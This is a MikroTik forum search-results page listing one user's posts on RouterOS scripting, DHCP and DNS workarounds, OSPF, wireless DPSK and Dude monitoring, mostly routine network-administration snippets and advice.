Community discussions

MikroTik App

Search found 124 matches

by excession
Wed Nov 13, 2024 7:04 pm
Forum: General
Topic: DHCP Design
Replies: 4
Views: 378

Re: DHCP Design

Relevant docs on the dhcp-server script function are here: https://help.mikrotik.com/docs/spaces/ROS/pages/24805500/DHCP#DHCP-DHCPServer There are also a few global vars you can use to get information about the current lease, you might for instance only want to action a gateway update if $leaseBound...
by excession
Wed Nov 13, 2024 1:49 am
Forum: General
Topic: DHCP Design
Replies: 4
Views: 378

Re: DHCP Design

When we build designs of this scale we group APs into different VLANS then have a VRRP router pair in each VLAN. I had a few ideas how you might approach this problem with your requirement to keep a single VLAN but I think the best one is to use the script function of the DHCP lease. The script opti...
by excession
Tue Nov 12, 2024 4:35 pm
Forum: Scripting
Topic: Need to resolve to multiple IP addresses
Replies: 8
Views: 875

Re: Need to resolve to multiple IP addresses

Very similar to a lot of config I use. Except I don't have the /routing rule.

Out of interest, since you're matching on dst-address, is there a specific subnet you're trying to hit over the tunnel?
In which case you can simply put a route to that subnet in your table instead.
by excession
Sun Nov 10, 2024 7:22 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Can someone add an apikey to the script? Updated 10-11-24 - Hi wfburton, I finally got around to adding optional api key support. (Free registration is here, if anyone else is interested: https://my.maclookup.app/login) I have no affiliation with the api developers, registration is optional. Their ...
by excession
Thu Nov 07, 2024 7:50 pm
Forum: Scripting
Topic: Need to resolve to multiple IP addresses
Replies: 8
Views: 875

Re: Need to resolve to multiple IP addresses

That aside, do you think there could be reasons why the /ip/firewall/address-list + route-mark solution could be slow? I see it even visually while running "kubectl get something", and Lens simply chokes and refuses to work with such a delay but does work when I have static routes in the ...
by excession
Thu Nov 07, 2024 7:47 pm
Forum: Scripting
Topic: Need to resolve to multiple IP addresses
Replies: 8
Views: 875

Re: Need to resolve to multiple IP addresses

If you know the number of IP addresses in advance: :for resolved from=0 to=($numberOfAddresses-1) do={ :set ($ipList->resolved) [:resolve $domain] } Ahhh :resolve does appear to work round robin, I didn't think it did. I guess then you should be able to do a :while loop of :resolve putting the resu...
by excession
Wed Nov 06, 2024 3:59 pm
Forum: Scripting
Topic: Need to resolve to multiple IP addresses
Replies: 8
Views: 875

Re: Need to resolve to multiple IP addresses

Sounds like there might be some other issues at play here, but just to focus on exactly what you asked for. You could achieve what you're after by combining an address list entry with your script. First, add an entry for the host you're trying to resolve: /ip/firewall/address-list add address=bbc.co...
by excession
Mon Oct 28, 2024 4:10 pm
Forum: Scripting
Topic: Script to obtain vendor info from MAC addresses (help needed) [SOLVED]
Replies: 7
Views: 1589

Re: Script to obtain vendor info from MAC addresses (help needed) [SOLVED]

This part from my script is the bit I think you're after and this does work in ROS v6: :local vendor :local vendorResult [/tool fetch url="https://api.maclookup.app/v2/macs/$MAC-ADDRESS-HERE/company/name" as-value output=user] :if (($vendorResult->"status")="finished") ...
by excession
Fri Oct 25, 2024 6:55 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

With the concern of not sharing private information along with not forgetting about allocations that are not the block large size; with a quick review, it appears the particular API you are using to get vendor information returns “IEEE Registration Authority” Updated 25-10-24 Hammer185 rightly poin...
by excession
Sun Oct 20, 2024 9:01 pm
Forum: Scripting
Topic: Search for a mac-address in the Bridge-Host or ARP table to extract the interface
Replies: 2
Views: 334

Re: Search for a mac-address in the Bridge-Host or ARP table to extract the interface

A way to simplify it a little, similar to the last problem, break the logic into two modular parts: { :local bridHost [/interface/bridge/host/print as-value] :local arpTable [/ip/arp/print as-value] :local iFace "*no interface*" # The following MACs are for testing purposes: # :local macAd...
by excession
Sun Oct 20, 2024 8:42 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Beautiful and useful script!

Thank you for writing this.
Thank you for letting me know you found it useful! :D
I got lots of inspiration from other peoples great work on the forum and some really useful feedback.
by excession
Sat Oct 19, 2024 10:52 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

I wrote a version that downloaded the wireshark oui database to do local matching. Borrowing from the great work here: https://forum.mikrotik.com/viewtopic.php?t=152632 to work through a large list in parts. Unfortunately I couldn't find a way (even after slimming down the dataset to just the requir...
by excession
Sat Oct 19, 2024 10:36 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

In the following code snippet, it does not work when the MAC address does not exist in the Bridge Host table, it gives me an empty result, I should see *NOT AVAILABLE*. If the MAC address does exist it reports your interface correctly. Might be better to start a new thread to work on your scripts, ...
by excession
Thu Oct 17, 2024 11:44 pm
Forum: Scripting
Topic: Experiments with [:convert] for bits&bytes +CSV from /iot/...
Replies: 5
Views: 844

Re: Experiments with [:convert] for bits&bytes +CSV from /iot/...

Wow, massive amount of useful work and great write-up. Thank you :)
by excession
Thu Oct 17, 2024 4:17 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Updated 17-10-24

Modified script in OP.
Now also lists interface, matched from the ARP table.
This is especially useful when you're scanning a bridge with multiple VLANs on it.
Moved the Neighbours table matching around slightly to also match if there's only an IP detected in the scan.
by excession
Thu Oct 17, 2024 4:12 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Nice, happy you could adapt it to your needs. :)
by excession
Thu Oct 17, 2024 1:41 am
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Could your script be adapted to get some data from the DHCP-Server/Leases screen only?
You can run this in the scheduler if you just need the same style output as you get from the print command:
/ip/dhcp-server/lease/print file=dhcp.txt where status=bound or status=waiting
by excession
Wed Oct 16, 2024 7:33 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Updated 16-10-24

Code above is updated, now sorts by IP address!
I'm sure my sorting method is horrific, please do chime in if you can tidy it up / make 1000% better by re-writing it.
by excession
Wed Oct 16, 2024 3:03 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Thanks for letting me know you found it useful!

Though I’d much rather Mikrotik would add this kind of metadata to the regular scan function. Preferably with the vendor data but even just the DHCP and Neighbours table info that’s already present in the system would be very welcome.
by excession
Tue Oct 15, 2024 11:44 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Updated 15-10-24 Modified above to include rextended's suggestions as well as those of a colleague. Script now only sends required octets to api. Random MAC addresses are shown as *LOCAL PRIVATE*. https://www.oasys.net/fragments/identify-private-macs/ Added a flag for DHCP state. Added the ability ...
by excession
Sat Oct 12, 2024 7:42 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Re: Enhanced IP Scan with Vendor and Additional Name Sources

Ahh rextended, always a pleasure. Good point about the mac addresses, I'll give that some thought, thank you. Don't suppose you could lend some of your expertise to my question about sorting multidimensional arrays in Mikrotik script? Perhaps an example that would work in my script and allow me to s...
by excession
Sun Oct 06, 2024 11:48 pm
Forum: Scripting
Topic: Enhanced IP Scan with Vendor and Additional Name Sources
Replies: 24
Views: 2996

Enhanced IP Scan with Vendor and Additional Name Sources

I often find myself wanting more from the standard IP-Scan tool. This script will perform a normal IP-Scan then augment it with vendor names pulled from api.maclookup.app. (The script is rate limited to not exceed the API limits, you can register for a free API key if you want to go faster and remov...
by excession
Mon Sep 02, 2024 2:58 pm
Forum: Announcements
Topic: 📣 WinBox 4 is here 📣
Replies: 1526
Views: 366384

Re: 📣 WinBox 4 is here 📣

Please re-instate the quick comment button :)
by excession
Fri Aug 30, 2024 11:43 am
Forum: Announcements
Topic: 📣 WinBox 4 is here 📣
Replies: 1526
Views: 366384

Re: 📣 WinBox 4 is here 📣

Lots to love, fresh, open, cleanish. haaaaaaaate the dropdown replacement for tabs though, much slower / irritating.

Bring back tabs!
by excession
Sat Aug 03, 2024 12:43 am
Forum: Scripting
Topic: Microsoft Endpoint List API to Address List Script
Replies: 0
Views: 1218

Microsoft Endpoint List API to Address List Script

Hi, this script downloads the full Microsoft Endpoint List from their API and then adds addresses and optionally URLs to both ipv4 and optionally ipv6 address lists. If URLs are enabled wildcard URLs are filtered out as they can't be supported by address lists, but the base URLs are preserved. This ...
by excession
Tue Jul 16, 2024 6:51 pm
Forum: General
Topic: Any way to show DHCP lease comment in ARP list?
Replies: 1
Views: 707

Re: Any way to show DHCP lease comment in ARP list?

#arp-with-dhcp-comments #store as a script then run from cli with somehting like: "sys script run arp-with-dhcp-comments" #Works through arp list printing entries with DHCP sourced comments #Builds a comment string allowing for multiple comments, though it seems quite unlikley this is nee...
by excession
Sat Jun 29, 2024 12:05 am
Forum: Beginner Basics
Topic: sfp+ port and 5gb fiber for rb5009 questions
Replies: 15
Views: 1162

Re: sfp+ port and 5gb fiber for rb5009 questions

I’m curious what type of “nodes” you’re talking about?

Did you consider a bonded Ethernet link to the rest of your network?

What does your topology look like?
by excession
Thu Jun 27, 2024 12:57 am
Forum: General
Topic: Shipped Credentials Don't Work - What I Did
Replies: 3
Views: 499

Shipped Credentials Don't Work - What I Did

I received a brand new RB5009 today, unfortunately the credentials on the device label and the separate label in the box (both the same) did not work when logging into the device. :( I reset the router, and netinsatlled the router to latest ver, still the same issue. In the end here's what worked fo...
by excession
Mon Jun 19, 2023 1:02 pm
Forum: Forwarding Protocols
Topic: V7 OSPF accept out filter - causes redistribute connected
Replies: 2
Views: 2356

Re: V7 OSPF accept out filter - causes redistribute connected

Thanks for the speedy clarification :)
by excession
Mon Jun 19, 2023 12:47 pm
Forum: Forwarding Protocols
Topic: V7 OSPF accept out filter - causes redistribute connected
Replies: 2
Views: 2356

V7 OSPF accept out filter - causes redistribute connected

V7.9.2 I've found that if I set an OSPF filter with a general accept rule such as: if ( dst-len > 0 ) { accept} or simply accept All connected routes are now advertised via OSPF even if no route types are selected in the Redistribute option and even if there are no interface templates advertising th...
by excession
Sat May 06, 2023 12:11 am
Forum: General
Topic: Help Identifying Traffic
Replies: 7
Views: 725

Re: Help Identifying Traffic

Thanks for the help.

For anyone else who comes across this, I don’t know for sure, but my primary suspect is SKY-Q boxes exchanging video streams.
by excession
Fri May 05, 2023 5:45 pm
Forum: General
Topic: Help Identifying Traffic
Replies: 7
Views: 725

Help Identifying Traffic

Hi does anyone have a reference for the Eth. Protocol codes in the torch tool? Capture111.PNG I'm trying to figure out what the "7a7a" traffic is. Ether4 is part of a bridge with a single host attached to it (a sensor relay that should see almost no traffic). I assumed it was some kind of ...
by excession
Mon Jun 06, 2022 4:30 pm
Forum: Scripting
Topic: Create directory on remote FTP server
Replies: 4
Views: 3012

Re: Create directory on remote FTP server

+1 !
by excession
Thu May 12, 2022 11:07 pm
Forum: The Dude
Topic: ros_command set variable from dude [SOLVED]
Replies: 4
Views: 11994

Re: ros_command set variable from dude [SOLVED]

Thank you! :)
by excession
Wed May 04, 2022 12:09 pm
Forum: The Dude
Topic: ros_command set variable from dude [SOLVED]
Replies: 4
Views: 11994

Re: ros_command set variable from dude [SOLVED]

+1 I'm also curious if there's a syntax that will make this work.
by excession
Wed May 04, 2022 11:57 am
Forum: Scripting
Topic: POE Power Script
Replies: 13
Views: 3886

Re: POE Power Script

Ooh, I like the $div function and the $ifWanted. Some useful stuff for me here on ROS syntax, thanks. I noticed on my CRS328 that total useable power capacity is actually dictated by which port block you're on. So each block of 8 ports has a separate 150w capacity. Was thinking about adding an optio...
by excession
Wed May 04, 2022 12:06 am
Forum: Scripting
Topic: POE Power Script
Replies: 13
Views: 3886

POE Power Script

Got a little annoyed trying to work with the standard POE monitor function, so wrote this little script to only show POE values for interfaces with POE demand and to calculate the total power draw. #poe-status :local poeOutStatus "" :local interfaceName "" :local poeOutPower 0 :l...
by excession
Mon Mar 07, 2022 4:10 pm
Forum: General
Topic: maximum interface count and other object limits
Replies: 3
Views: 1133

Re: maximum interface count and other object limits

Hello, My goal is to have - 4000 x VLAN interfaces - 4000 x VRRP interfaces (1 for each VLAN) - 8000 IP addresses - (1 ip for each VLAN + 1 ip for each VRRP) it seems the problem is with high number of VRRP interfaces. Above certain amount (trying to figure it out) some of the VRRP interfaces becom...
by excession
Sat Feb 19, 2022 12:26 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

We use Ruckus DPSK in the “group DPSK” mode. Like this it doesn’t care about MAC addresses, just that your device knows the PSK for that group. We tend to use it in MDU environments, one DPSK per apartment, landing the user on the associated VLAN for that DPSK.
by excession
Fri Feb 18, 2022 7:45 pm
Forum: General
Topic: Feature request for v7.x
Replies: 296
Views: 111077

Re: Feature request for v7.x

Other vendors have this feature.
Doesn’t seem like a patent issue if you don’t try and call it DPSK.
by excession
Fri Feb 18, 2022 7:42 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

Cambian have EPSK, which is basically the same thing.
Seems like marketing, rather than technical patent.

Good effort btw.
by excession
Fri Feb 18, 2022 4:13 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

That's a shame, but thanks for sharing your results.
I don't think Mikrotik quite get the use case we're going for here or why we'd like this slight change in the validation behaviour to start with.
Probably isn't going to change without some campaigning.
by excession
Wed Jan 05, 2022 2:07 am
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

I get that your experience has told you not to use MikroTik radios, but come on my Man, you’re on a MikroTik forum here; are you jumping on every forum post about setting up a hotspot or configuring caps-man and derailing the conversation buy telling everyone who’s come here for exactly this vendor ...
by excession
Tue Jan 04, 2022 1:19 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

I broadly agree with you Gotsprings, we too deploy a lot of Ruckus. But I also think there is a place in the Market for MikroTik and have found many places to successfully use their Radios as well. This isn’t a discussion over who’s better; just an examination of DPSK functionality and if it’s possi...
by excession
Tue Jan 04, 2022 12:00 am
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

The last time I tested this it didn’t work. I think that was v6.48. T do you run now v6.49.x to test it again? May it works in v7.x? When I get a chance I will try it again. I’ve kept a close eye on release notes and I’ve never seen any work on this topic though; sadly I get the impression that Mik...
by excession
Mon Jan 03, 2022 9:18 pm
Forum: Wireless Networking
Topic: DPSK Dynamic WPA2 PSK support [SOLVED]
Replies: 36
Views: 33393

Re: DPSK Dynamic WPA2 PSK support [SOLVED]

No problem, thanks a lot for testing and sharing 😀. I'm currently only on mobile so I cannot contribute anything. Would it still work if it is done with 2 rules like that but with different private-pre-shared-key? Like private-pre-shared-key="user1" vlan-id=1 private-pre-shared-key="...
by excession
Wed Nov 03, 2021 9:26 pm
Forum: General
Topic: 7.0.4 Upgrade Path
Replies: 7
Views: 1328

Re: 7.0.4 Upgrade Path

I know this is dumb. But how exactly?
by excession
Wed Nov 03, 2021 2:17 pm
Forum: General
Topic: DHCP acting weird
Replies: 11
Views: 1606

Re: DHCP acting weird

Are you able to cut the switch out in your testing? Connect a laptop or AP directly to the router?
by excession
Wed Nov 03, 2021 2:15 pm
Forum: General
Topic: DHCP acting weird
Replies: 11
Views: 1606

Re: DHCP acting weird

I notice your guest Vlan appears to have a slightly increased MTU but the underlying interface is ether 5 where as you've increased the MTU on ether 3? This looks odd to me. Also keep in mind any switches you then connect on to will need a correspondingly enlarged MTU. /interface ethernet set [ find...
by excession
Wed Nov 03, 2021 2:01 pm
Forum: General
Topic: 7.0.4 Upgrade Path
Replies: 7
Views: 1328

Re: 7.0.4 Upgrade Path

Presumably there will be some fixes between now and a stable release of v7 that might benefit this piece of hardware?

Seems there's no path for that to happen, just wait for v7.* stable? (Assuming I don't want to run a development release)
by excession
Wed Nov 03, 2021 12:53 pm
Forum: General
Topic: DHCP acting weird
Replies: 11
Views: 1606

Re: DHCP acting weird

Share your config:
export hide-sensitive
by excession
Wed Nov 03, 2021 12:33 pm
Forum: General
Topic: 7.0.4 Upgrade Path
Replies: 7
Views: 1328

7.0.4 Upgrade Path

We received a CCR2004-16G-2S+ this week that shipped with 7.0.4 installed. I've seen several people say 7.0.4 is a "special" release that's not publicly available and therefore you should be careful changing from it. Can anyone tell me at what point I should update this device and to what ...
by excession
Thu Oct 14, 2021 6:09 pm
Forum: General
Topic: SFP28 to QSFP
Replies: 1
Views: 785

SFP28 to QSFP

Hi, I'm looking at paring a CCR2004-1G-12S+2XS with a CRS326-24S+2Q+RM. I'd like to use a LAG to join the two, preferably using the 2 x SFP28 ports on the router and the QSFP ports on the Switch. I'm imagining it should be possible to get 20Gbps on each leg of my LAG, given that the QSFP is 4 x 10Gb...
by excession
Mon Sep 06, 2021 10:34 pm
Forum: General
Topic: Is there a problem with IP Cloud? [SOLVED]
Replies: 70
Views: 28143

Re: Is there a problem with IP Cloud? [SOLVED]

Hi rextended & excession, are you saying this added bit to a config will fix the problem temporarily? /ip dns static add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD If you have a local Tik doing DNS for you (or another DNS server you can configure conditiona...
by excession
Mon Sep 06, 2021 8:45 pm
Forum: General
Topic: Is there a problem with IP Cloud? [SOLVED]
Replies: 70
Views: 28143

Re: Is there a problem with IP Cloud? [SOLVED]

Mikroitk's revolvers are still working, you can add a conditional rule to get your resolution working again:

159.148.147.201
159.148.172.251
/ip dns static
add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD
by excession
Mon Sep 06, 2021 8:36 pm
Forum: General
Topic: mynetname.net is suspended
Replies: 80
Views: 48292

Re: mynetname.net is suspended

Mikroitk's revolvers are still working, you can add a conditional rule to get your local resolution working again:

159.148.147.201
159.148.172.251
/ip dns static
add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD
by excession
Mon Sep 06, 2021 8:34 pm
Forum: General
Topic: Cloud DNS Seems to be down!
Replies: 25
Views: 8874

Re: Cloud DNS Seems to be down!

Mikroitk's revolvers are still working, you can add a conditional rule to get your resolution working again:

159.148.147.201
159.148.172.251
/ip dns static
add forward-to=159.148.147.201 regexp=".*mynetname\\.net" ttl=10m type=FWD
by excession
Mon Sep 06, 2021 6:19 pm
Forum: General
Topic: Cloud DNS Seems to be down!
Replies: 25
Views: 8874

Re: Cloud DNS Seems to be down!

Domain Name: MYNETNAME.NET Registry Domain ID: 1856616582_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2021-09-06T10:48:10Z Creation Date: 2014-04-29T08:21:38Z Registrar Registration Expiration Date: 2022-04-29T08:21...
by excession
Mon Sep 06, 2021 6:14 pm
Forum: General
Topic: Cloud DNS Seems to be down!
Replies: 25
Views: 8874

Re: Cloud DNS Seems to be down!

Oooh, that doesn't look good.
Name Server NS1.SUSPENDED-DOMAIN.COM
Anyone know on average how long it takes to resolve a suspended domain? They could just transfer it right?
by excession
Mon Sep 06, 2021 5:43 pm
Forum: General
Topic: Cloud DNS Seems to be down!
Replies: 25
Views: 8874

Re: Cloud DNS Seems to be down!

I'm also seeing issues through 1.1.1.1 and 8.8.8.8 in the UK.

4.2.2.4 and 208.67.222.222 are not working for me either.

https://dnschecker.org - Is showing about half the world unable to resolve these addresses right now.

Is there a service status page for Mikrotik's dynamic DNS?
by excession
Sat May 22, 2021 9:07 pm
Forum: Scripting
Topic: Remove Nat Sessions on a specific event
Replies: 22
Views: 10650

Re: Remove Nat Sessions on a specific event

DO NOT WORK as expected read this: https://forum.mikrotik.com/viewtopic.php?f=9&t=154606&p=853803&hilit=firewall+connection+remove#p853800 haha I knew as I wrote that there was something I’d forgotten about this. Thanks, I’d read your post before; I’d even updated my script with it but ...
by excession
Sat May 22, 2021 7:34 pm
Forum: Scripting
Topic: How to get value in wireless monitor?
Replies: 11
Views: 3226

Re: How to get value in wireless monitor?

Paste this on terminal: /interface wireless set wlan1 country=debug frequency-mode=superchannel tx-power-mode=all-rates-fixed tx-power=15 wps-mode=disabled station-roaming=disabled It's fun to see the superchannel "solution" recommended; often no-one mentions it, possibly in the hope that...
by excession
Sat May 22, 2021 7:14 pm
Forum: Scripting
Topic: Remove Nat Sessions on a specific event
Replies: 22
Views: 10650

Re: Remove Nat Sessions on a specific event

I use this in both the up and down actions of a netwatch entry that pings my next hop gateway:
/ip firewall connection remove [find];
:log info ("Cleared-Connecitons");
by excession
Mon Oct 12, 2020 4:33 pm
Forum: General
Topic: L2 Design for PPPOE Service Delivery
Replies: 2
Views: 932

Re: L2 Design for PPPOE Service Delivery

Great article, thank you very much! I have not included it here for simplicity, but we actually will have two AC's on site and it's my intention to make them both available to all clients. Since we won't have very many, possibly 10-20 PPPOE clients in the building, I had thought to just let each cli...
by excession
Mon Oct 12, 2020 2:04 pm
Forum: General
Topic: L2 Design for PPPOE Service Delivery
Replies: 2
Views: 932

L2 Design for PPPOE Service Delivery

Hi, we have a new build where we're going to offer internet service via PPPOE to various clients within a large building. A simplified view of the network is RTR -> Switch Stack -> PPPOE Clients. Simplified Overview: overview.PNG The switch stack will also be used for other things but I'm focused he...
by excession
Tue Sep 15, 2020 6:25 pm
Forum: The Dude
Topic: Dude show password
Replies: 1
Views: 5255

Re: Dude show password

You, my friend, have re-discovered the wheel!
It's by design. Don't let anyone you don't trust with the password to every device, use your Dude...
by excession
Tue Sep 15, 2020 6:21 pm
Forum: The Dude
Topic: Custom Tool and IP referencing
Replies: 1
Views: 4645

Re: Custom Tool and IP referencing

You can run a tool directly from any associated IP:
Capture.PNG
by excession
Tue Sep 15, 2020 6:14 pm
Forum: The Dude
Topic: Dude Device Name
Replies: 1
Views: 4915

Re: Dude Device Name

Unfortunately you do have to set the device name manually. When I'm setting up a new map I often use the sysname OID on the appearance tab then manually set the device name as well. Alternatively when reverse DNS is available we sometimes use [Device.FirstDnsName] on the appearance tab instead, then...
by excession
Tue Sep 15, 2020 6:05 pm
Forum: The Dude
Topic: DDNS with AGENTs
Replies: 1
Views: 4138

Re: DDNS with AGENTs

In v6> Dude, DNS names are allowed for adding devices. When those devices are ROS you can use them as agents as long as they are using exactly the same ROS version as your Dude server.
by excession
Tue Sep 15, 2020 5:56 pm
Forum: The Dude
Topic: Monitoring Mikrotik network with Zabbix - advice
Replies: 1
Views: 4554

Re: Monitoring Mikrotik network with Zabbix - advice

Can you run windows commands from within Zabbix? In which case Winbox supports passing the following parameters. Try this in a run prompt: C:\winbox.exe IPAddress User Password (Above assumes you have winbox.exe in the root of your C: drive) All options are required to initialize the session without...
by excession
Tue Sep 15, 2020 2:47 pm
Forum: The Dude
Topic: Dude device bulk password change
Replies: 6
Views: 6055

Re: Dude device bulk password change

Bash SSH script or Ansible if you have SSH enabled. Not as hard as you might think (assuming these are new to you). And since you can run any ROS command using the dude, although it’s designed to gather information, I’ve always thought it should be possible with the ROS CMD function in the Dude. Tho...
by excession
Mon Sep 14, 2020 5:54 pm
Forum: The Dude
Topic: Concatenate - how to properly escape double quotes?
Replies: 3
Views: 5151

Re: Concatenate - how to properly escape double quotes?

Just throwing out this idea / haven't thought about it too hard / almost certainly won't work / wasting my time and yours...
Could you try calling the "FirstAddress" variable in a new dude function then use that dude function in it's place in your concatenate line?
by excession
Mon Sep 14, 2020 5:13 pm
Forum: The Dude
Topic: Dude device bulk password change
Replies: 6
Views: 6055

Re: Dude device bulk password change

You can also make multi-device edits from the devices list, you can even filter that first if need be. Until Mikrotik develop an API for the Dude, this is your only practical solution. As I recall, someone did release their experiments decoding the Dude database on git-hub. They also alluded to the ...
by excession
Mon Aug 31, 2020 6:24 pm
Forum: Wireless Networking
Topic: Wifi Radar
Replies: 8
Views: 2858

Re: Wifi Radar

First create a system script with the following line, substitute your wlan interface name and the duration you want to run the snoop for, save it with the name "snoop": /interface wireless snooper flat-snoop wlan1 duration=5s Then run the following command to capture the output of that scr...
by excession
Sun Aug 30, 2020 5:25 pm
Forum: RouterBOARD hardware
Topic: SXTsq Getting Retired? (Out of stock in UK)
Replies: 1
Views: 753

SXTsq Getting Retired? (Out of stock in UK)

SXTsq 5 ac seems to be out of stock everywhere in the UK. Is this just due to Covid, are new units incoming? Doesn't seem to just be the 5 ac either, most SXTsq products seem to be quite difficult to get hold of right now and the 60ghz unit appears to have been replaced entirely by the new Cube lite...
by excession
Sun Jul 19, 2020 5:40 pm
Forum: The Dude
Topic: Practical VPN speed SSTP vs L2TP/IPSec [SOLVED]
Replies: 2
Views: 10088

Re: Practical VPN speed SSTP vs L2TP/IPSec [SOLVED]

We have both SSTP and L2TP/IPSEC setup on an RB3011. We see about 25mbps on SSTP and 40mbps on L2TP/IPSEC (an individual user testing one at a time), underlying connection is capable of 200mbps. We also deploy Soft-Ether quite often for our clients where they have either VMs or Windows servers avail...
by excession
Tue May 26, 2020 8:25 pm
Forum: The Dude
Topic: IPSEC Dude Monitoring Script
Replies: 0
Views: 3554

IPSEC Dude Monitoring Script

Below is my first stab at getting IPSEC monitoring of a ROS device into the Dude interface. Right now I've made two versions of the script, one for status indicators on a device and the other for on a link. The script pulls from the IPSEC Policies table, filters out templates and disabled entries th...
by excession
Fri Mar 20, 2020 12:27 am
Forum: Beginner Basics
Topic: PTP link for shooting range camera.
Replies: 2
Views: 2763

Re: PTP link for shooting range camera.

Try station psudo-bridge instead of station bridge and put the wireless interface and the wired interface in a bridge together.
by excession
Thu Mar 19, 2020 1:16 am
Forum: General
Topic: Strange issue with IPSEC
Replies: 2
Views: 1504

Re: Strange issue with IPSEC

by excession
Thu Mar 19, 2020 12:47 am
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 3125

Re: Mikrotik and Sonicwall on same switch

Or I suppose as an outlier you might have a weird firewall rule or bridge filter that could prevent such a ping, but that’s pretty unusual.
export hide-sensitive 
Post your config here if you want me to check.
by excession
Thu Mar 19, 2020 12:17 am
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 3125

Re: Mikrotik and Sonicwall on same switch

If your PC’s get an IP and can ping the Sonicwall when plugged into the wall port directly but not when plugged into the pass through port then it has to be an issue with the pass through ports. I’m not familiar with Grandstream handsets but I have come across configs on IP phones that disable the p...
by excession
Wed Mar 18, 2020 11:31 pm
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 3125

Re: Mikrotik and Sonicwall on same switch

Are you sure there aren’t any VLANs configured on the switch? If your subnets are on different VLANs you need to make sure the pass through ports on your phones are on the right VLAN, which in this case is probably a different VLAN to the one the phones themselves should be on. It’s common in this k...
by excession
Wed Mar 18, 2020 10:42 pm
Forum: General
Topic: I can´t see the network in Google Cloud Platform
Replies: 5
Views: 4712

Re: I can´t see the network in Google Cloud Platform

Ha! That's gold. Initially when I tried to follow your instruction I tried to route the remote subnet to the gateway address of the local subnet, which didn't work. When I simply selected the interface of the local subnet instead it worked. I'm guessing the difference is that instead of trying to pu...
by excession
Wed Mar 18, 2020 8:25 pm
Forum: General
Topic: Mikrotik and Sonicwall on same switch
Replies: 9
Views: 3125

Re: Mikrotik and Sonicwall on same switch

It’s hard to be sure of your topology from your description, however.... It sounds like you would benefit from knowing that you can assign multiple IP addresses on different subnets to the same interface on a Mikrotik. So just add an IP to the Mikrotik’s LAN port that’s on the same subnet as the Son...
by excession
Wed Mar 18, 2020 8:11 pm
Forum: General
Topic: I can´t see the network in Google Cloud Platform
Replies: 5
Views: 4712

Re: I can´t see the network in Google Cloud Platform

Try pinging through your Mikrotik router from a client on the LAN side to a host in your GCP subnet. I’ve never been able to get a Mikrotik IPSEC peer to be able to talk to a remote subnet when building IPSEC tunnels but clients on the LAN side have communicated happily through those same tunnels. I...
by excession
Sat Mar 14, 2020 1:28 am
Forum: RouterBOARD hardware
Topic: hardware idea for a multiport switch
Replies: 90
Views: 124260

Re: hardware idea for a multiport switch

It’s a fun idea, but I think I’d rather see a 2u front facing high density. Oh and stacking or expander functionality in ROS!
by excession
Sun Feb 16, 2020 11:19 am
Forum: RouterOS beta
Topic: VxLAN example configuration
Replies: 19
Views: 40804

Re: VxLAN example configuration

Thanks for sharing.
by excession
Sat Feb 15, 2020 4:20 pm
Forum: RouterOS beta
Topic: VRRP ros7 beta 5
Replies: 0
Views: 3251

VRRP ros7 beta 5

